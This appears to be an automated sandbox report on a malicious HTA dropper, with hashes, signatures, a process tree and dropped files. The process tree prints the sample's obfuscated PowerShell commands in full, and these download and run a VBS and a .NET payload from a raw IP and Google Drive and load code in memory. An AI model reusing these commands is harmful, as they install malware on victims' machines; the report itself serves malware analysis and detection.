Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2024 05:24

General

  • Target

    c0efd41f38466ebdf9a361f924bc0c6b11eb5e68c9b1adb4531df5b302f155e0.hta

  • Size

    205KB

  • MD5

    169a69d33b8480d6ba11f950cb28ff48

  • SHA1

    f74e2a219d7cf49a08bd12dbd4dcde6b63578563

  • SHA256

    c0efd41f38466ebdf9a361f924bc0c6b11eb5e68c9b1adb4531df5b302f155e0

  • SHA512

    7b16659dd7c2bb88870d5c2185b323c078c4b8009bea7ecab534a3705b3c4d585e9dc42acff3122bc718ba884c801db198c73b2630ebecb8f67b17ebcf762236

  • SSDEEP

    48:4FhWsTR/F7gNqXfkwzTqzw4S7u2WAhq0K8Kw99Dd7gZoSdrq67mz9z12gcie9NzB:43F97AcaIN6wfNcoSdrruh2iuRGQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c0efd41f38466ebdf9a361f924bc0c6b11eb5e68c9b1adb4531df5b302f155e0.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3912
    • C:\Windows\SysWOW64\wIndOWspOweRsHElL\v1.0\powERshELL.eXE
      "C:\Windows\sYstEM32\wIndOWspOweRsHElL\v1.0\powERshELL.eXE" "pOwerShELL -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE ; IeX($(IeX('[SYSteM.TEXT.encodING]'+[CHAR]58+[cHar]58+'uTF8.GeTStrINg([SYsTEm.ConVERT]'+[CHAR]0x3a+[cHaR]58+'frOMbasE64STriNg('+[chaR]34+'JHlLdEl4amsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVmaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0RyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxZEtVLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdFQURoRXFaSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd1JPVnRsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhTcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktwY3ZWayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0JvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeUt0SXhqazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1LjE0OS4yNDEuMTgzL01QRFctY29uc3RyYWludHMudmJzIiwiJGVOVjpBUFBEQVRBXG5lZXRhbmRjbGVhbnRoaW5nc2Zvcmdvb2QudmJzIiwwLDApO1N0QXJ0LXNsRUVQKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxuZWV0YW5kY2xlYW50aGluZ3Nmb3Jnb29kLnZicyI='+[ChAR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:244
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3960
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rt1enow3\rt1enow3.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4196
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7B3.tmp" "c:\Users\Admin\AppData\Local\Temp\rt1enow3\CSC365E0C5C6EF246B787618E214898C3D.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2484
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs"
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdmRUdpbWFnZScrJ1VybCA9IGVJR2h0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIGVJRztmRUd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2ZFR2ltYWdlQnl0ZXMgPSBmRUd3ZWJDbGllbnQuRG93bmxvYWREYXRhKGZFR2ltYWdlVXJsJysnKTtmRUdpbWEnKydnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhmRUdpbWFnZUJ5dGVzKTtmRUdzdGFydEZsYWcgPSBlSUc8JysnPEJBU0U2NF9TVEFSVD4+ZUlHO2ZFR2VuZEZsYWcgPSBlSUc8JysnPEJBU0U2NF9FTkQ+PmVJRztmRUdzdGFydEluZGV4ID0gZkVHaW1hZ2VUJysnZXh0LkluZGV4T2YoZkVHc3RhcnRGbGFnKTtmRUdlbmRJbmRleCA9IGZFR2ltYWdlVGV4dC5JbmRleCcrJ09mKGZFR2VuZEZsYWcnKycpO2ZFR3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBmRUdlbmRJbmRleCAtZ3QgZkVHc3RhcnRJbmRleCcrJztmRUdzdGFydEluZGV4ICs9IGZFR3N0YXJ0RmxhZy5MZW5ndGg7ZkVHYmFzZTY0TGVuZ3RoID0gZkVHZW5kSW5kZXggLSBmRUdzdGFydEluZGV4O2ZFR2JhcycrJ2U2NENvbW1hbmQgPSBmRUdpbWFnZVRleHQuU3Vic3RyaW5nKGZFR3N0YXJ0SW5kZXgsIGZFR2Jhc2U2NExlbmd0aCk7ZkVHYicrJ2FzZTY0UmV2ZXJzZWQgPSAtam9pbiAoZkVHYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEhldyBGJysnb3JFYWNoLU9iamVjdCB7IGZFR18nKycgfSlbLTEuLi0oZkVHYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtmRUcnKydjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGJysncm9tQmFzZTY0U3RyaW5nKGZFR2Jhc2U2NFJldmVyc2VkKTtmRUdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoZkVHY29tbWFuZEJ5dGVzKTtmRUd2YWlNZXRob2QgPSBbZG5saWIuSU8uJysnSG9tZV0uR2V0TWV0aG9kKGVJR1ZBSWVJRycrJyk7ZkVHdmFpTWV0aG9kLkludicrJ29rZShmRUdudWxsLCBAKGVJR3R4dC5kJysndWR1ZHVkdWR1RC8zODEuMTQyLjk0MS41NC8vOnB0dGhlSUcsIGVJR2QnKydlc2F0aXZhZG9lSUcsJysnIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR0FkZEluUHJvY2VzczMyZUlHLCBlSScrJ0dkZXNhdGl2YWRvZUlHLCBlSUdkZXNhdGl2YWRvZUlHLGVJR2RlJysnc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUdkZXNhdGl2YWRvZUlHLGVJR2Rlc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUcxZUlHLGVJR2Rlc2F0aXZhZG9lSUcpKTsnKS5SZVBMQUNlKChbQ2hhcl0xMDErW0NoYXJdNzMrW0NoYXJdNzEpLFtTVFJpTmddW0NoYXJdMzkpLlJlUExBQ2UoJ2ZFRycsW1NUUmlOZ11bQ2hhcl0zNikuUmVQTEFDZSgoW0NoYXJdNzIrW0NoYXJdMTAxK1tDaGFyXTExOSksW1NUUmlOZ11bQ2hhcl0xMjQpIHwuKCAkRW52OkNvTXNwRWNbNCwyNiwyNV0tSk9JTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4428
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('fEGimage'+'Url = eIGhttps:/'+'/drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur eIG;fEGwebClient = New-Object System.Net.WebClient;fEGimageBytes = fEGwebClient.DownloadData(fEGimageUrl'+');fEGima'+'geText = [System.Text.Encoding]::UTF8.GetString(fEGimageBytes);fEGstartFlag = eIG<'+'<BASE64_START>>eIG;fEGendFlag = eIG<'+'<BASE64_END>>eIG;fEGstartIndex = fEGimageT'+'ext.IndexOf(fEGstartFlag);fEGendIndex = fEGimageText.Index'+'Of(fEGendFlag'+');fEGstartIndex -ge 0 -and fEGendIndex -gt fEGstartIndex'+';fEGstartIndex += fEGstartFlag.Length;fEGbase64Length = fEGendIndex - fEGstartIndex;fEGbas'+'e64Command = fEGimageText.Substring(fEGstartIndex, fEGbase64Length);fEGb'+'ase64Reversed = -join (fEGbase64Command.ToCharArray() Hew F'+'orEach-Object { fEG_'+' })[-1..-(fEGbase64Command.Length)];fEG'+'commandBytes = [System.Convert]::F'+'romBase64String(fEGbase64Reversed);fEGloadedAssembly = [System.Reflection.Assembly]'+'::Load(fEGcommandBytes);fEGvaiMethod = [dnlib.IO.'+'Home].GetMethod(eIGVAIeIG'+');fEGvaiMethod.Inv'+'oke(fEGnull, @(eIGtxt.d'+'ududududuD/381.142.941.54//:pttheIG, eIGd'+'esativadoeIG,'+' eIGdesativadoeIG, eIGdesativadoeIG, eIGAddInProcess32eIG, eI'+'GdesativadoeIG, eIGdesativadoeIG,eIGde'+'sativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIG1eIG,eIGdesativadoeIG));').RePLACe(([Char]101+[Char]73+[Char]71),[STRiNg][Char]39).RePLACe('fEG',[STRiNg][Char]36).RePLACe(([Char]72+[Char]101+[Char]119),[STRiNg][Char]124) |.( $Env:CoMspEc[4,26,25]-JOIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4352

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powERshELL.eXE.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    6KB

    MD5

    68de2bba2a3cb359f90d8bbed60af84a

    SHA1

    cde24e176f9f9769c44d981981f6804ae65d9894

    SHA256

    6dd13e229f64c4c969bf8ae3538642ec833312856f1dfd0a2e4a4e06c0ea2b1f

    SHA512

    51090f04a558c71016d7729845133fcb59765b0b85f8d4fbc6f2d44eb474439180656950442b31a3f2c8dd21ba22b54e91cc0446a55d354c4b75be02f0f0a86f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    21f8f3ca98f4026ace890df18d64f8ba

    SHA1

    835ae12a32487c4cbe65020df8ac5fb4bc11ad0f

    SHA256

    99c88c1c91cef895323b3e784485103327f31ecbdc352770f768fcb0bd90c51d

    SHA512

    ccef18653b8183fab52cade5486148e66631353ffc5380a89f2932b5d6e5a20ebd7f8513babf8c9cfed8375689990b2ae913ffffefe4a88c4b6fafb226b8a7a1

  • C:\Users\Admin\AppData\Local\Temp\RESD7B3.tmp

    Filesize

    1KB

    MD5

    ae800ad5209d809fc00b62a4351e3123

    SHA1

    ad7d28bfde40f01100ebb4f15a340eee935f7fb8

    SHA256

    3c0a4daff2283d9f9b4df241375190c0004bafc104c7ca182b2ad1590845c185

    SHA512

    1fecddc3441daf74b4906359b69ae11bc6192624821d0204657055f6cbe60026158dad4e75e1963e8bbce89f0c30110594a7e91cf79ad0ba57edac217238589e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vasxg2gz.mix.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\rt1enow3\rt1enow3.dll

    Filesize

    3KB

    MD5

    4a6958e13066bf2ad8c1247482219148

    SHA1

    2f47c5ebc431a09840acd0ea54a63f538a1f6da2

    SHA256

    89c89faf83272cf4e819baad7f7ec6af9428b712d8978a580b8e2b3a9a80f8c5

    SHA512

    a29b44fedd95c6284038a452425e8eda28a859c1c4aba7d4a0960340ce5a551093429c2b2d0e4798f7f90d843ac905677c49d60b6edc67099ef2cbad2300e17b

  • C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs

    Filesize

    68KB

    MD5

    d27816d0f221aaf7a0362700a3e0a5b4

    SHA1

    390961053e0642b3715262962533550675dbd9b5

    SHA256

    9a81502d5d1efb62ca49e778c4e117b4784ead30b3565e80bdf5139d9ecd7162

    SHA512

    29e68d3d817699d950f6165e199eaa83cb14f9b0238e53d580ee78b2bf2c883370faf389e24b1fae8aded4758d7399a94ead882ad30398ce8cf9fa564796f76e

  • \??\c:\Users\Admin\AppData\Local\Temp\rt1enow3\CSC365E0C5C6EF246B787618E214898C3D.TMP

    Filesize

    652B

    MD5

    a5db35c2a10673f565bee8b0b236f41b

    SHA1

    0ad39404e7800dad8f65b714999f4938d551ce2c

    SHA256

    0718b7ffca2ed1f2b81f3e77fe38637f4123787defd622cc7a24ad7834b6a293

    SHA512

    49c1043d284800491275ed061fe4695d603d39775551617798916d98cd52a65ee8d56e40df84c9cef962fb2de0da0a03b0fb636fa6c42207f0d108bfe20ef112

  • \??\c:\Users\Admin\AppData\Local\Temp\rt1enow3\rt1enow3.0.cs

    Filesize

    467B

    MD5

    d12717d89552ddb8b59a93f6d7b53650

    SHA1

    8141049952e7f42cd8ff2931934515a6b3901135

    SHA256

    90f46741701b8bb295ffb92a94a70d5233d2ec0f4a58941f7c1fa4a8d6a0276c

    SHA512

    42056b6146e8543dd33cc5645c6527264bfb30cc159259dae2beb03fed25aa719d257ad0e4b96ba0a02f59655ccda5bb4865623e093ad3e7dd621bd3d463a19f

  • \??\c:\Users\Admin\AppData\Local\Temp\rt1enow3\rt1enow3.cmdline

    Filesize

    369B

    MD5

    58a83b5b08f59e745e71f17bb4f69ec2

    SHA1

    6b64a81fee2f0545bab2a8d98878de292a5cfba4

    SHA256

    55538ecf460b04f53f9764b5038aecbd906fabae4b6b3ddd2f6d9285ddba5df7

    SHA512

    33027d76d3c843768cbe2bf54ecb7e14f6b0aac44c8f1bb5cffe5bf7d5f2dc85d5bb4d23b81c60abc6a171e1c53e43537e9a5c21a05a7f56b561c8b59c57fac0

  • memory/244-17-0x0000000006370000-0x00000000066C4000-memory.dmp

    Filesize

    3.3MB

  • memory/244-72-0x0000000008C40000-0x00000000091E4000-memory.dmp

    Filesize

    5.6MB

  • memory/244-1-0x00000000053D0000-0x0000000005406000-memory.dmp

    Filesize

    216KB

  • memory/244-79-0x0000000070E60000-0x0000000071610000-memory.dmp

    Filesize

    7.7MB

  • memory/244-4-0x0000000070E60000-0x0000000071610000-memory.dmp

    Filesize

    7.7MB

  • memory/244-3-0x0000000070E60000-0x0000000071610000-memory.dmp

    Filesize

    7.7MB

  • memory/244-2-0x0000000005BF0000-0x0000000006218000-memory.dmp

    Filesize

    6.2MB

  • memory/244-19-0x00000000069D0000-0x0000000006A1C000-memory.dmp

    Filesize

    304KB

  • memory/244-71-0x0000000007D50000-0x0000000007D72000-memory.dmp

    Filesize

    136KB

  • memory/244-5-0x00000000059C0000-0x00000000059E2000-memory.dmp

    Filesize

    136KB

  • memory/244-65-0x0000000006F50000-0x0000000006F58000-memory.dmp

    Filesize

    32KB

  • memory/244-6-0x0000000006290000-0x00000000062F6000-memory.dmp

    Filesize

    408KB

  • memory/244-7-0x0000000006300000-0x0000000006366000-memory.dmp

    Filesize

    408KB

  • memory/244-0-0x0000000070E6E000-0x0000000070E6F000-memory.dmp

    Filesize

    4KB

  • memory/244-18-0x0000000006990000-0x00000000069AE000-memory.dmp

    Filesize

    120KB

  • memory/3960-44-0x0000000007610000-0x000000000761A000-memory.dmp

    Filesize

    40KB

  • memory/3960-50-0x0000000007830000-0x0000000007838000-memory.dmp

    Filesize

    32KB

  • memory/3960-48-0x00000000077F0000-0x0000000007804000-memory.dmp

    Filesize

    80KB

  • memory/3960-47-0x00000000077E0000-0x00000000077EE000-memory.dmp

    Filesize

    56KB

  • memory/3960-46-0x00000000077B0000-0x00000000077C1000-memory.dmp

    Filesize

    68KB

  • memory/3960-45-0x0000000007840000-0x00000000078D6000-memory.dmp

    Filesize

    600KB

  • memory/3960-49-0x0000000007900000-0x000000000791A000-memory.dmp

    Filesize

    104KB

  • memory/3960-43-0x00000000075B0000-0x00000000075CA000-memory.dmp

    Filesize

    104KB

  • memory/3960-40-0x0000000006830000-0x000000000684E000-memory.dmp

    Filesize

    120KB

  • memory/3960-41-0x0000000007480000-0x0000000007523000-memory.dmp

    Filesize

    652KB

  • memory/3960-42-0x0000000007BF0000-0x000000000826A000-memory.dmp

    Filesize

    6.5MB

  • memory/3960-29-0x0000000007440000-0x0000000007472000-memory.dmp

    Filesize

    200KB

  • memory/3960-30-0x000000006D720000-0x000000006D76C000-memory.dmp

    Filesize

    304KB

  • memory/4428-89-0x0000000005FA0000-0x00000000062F4000-memory.dmp

    Filesize

    3.3MB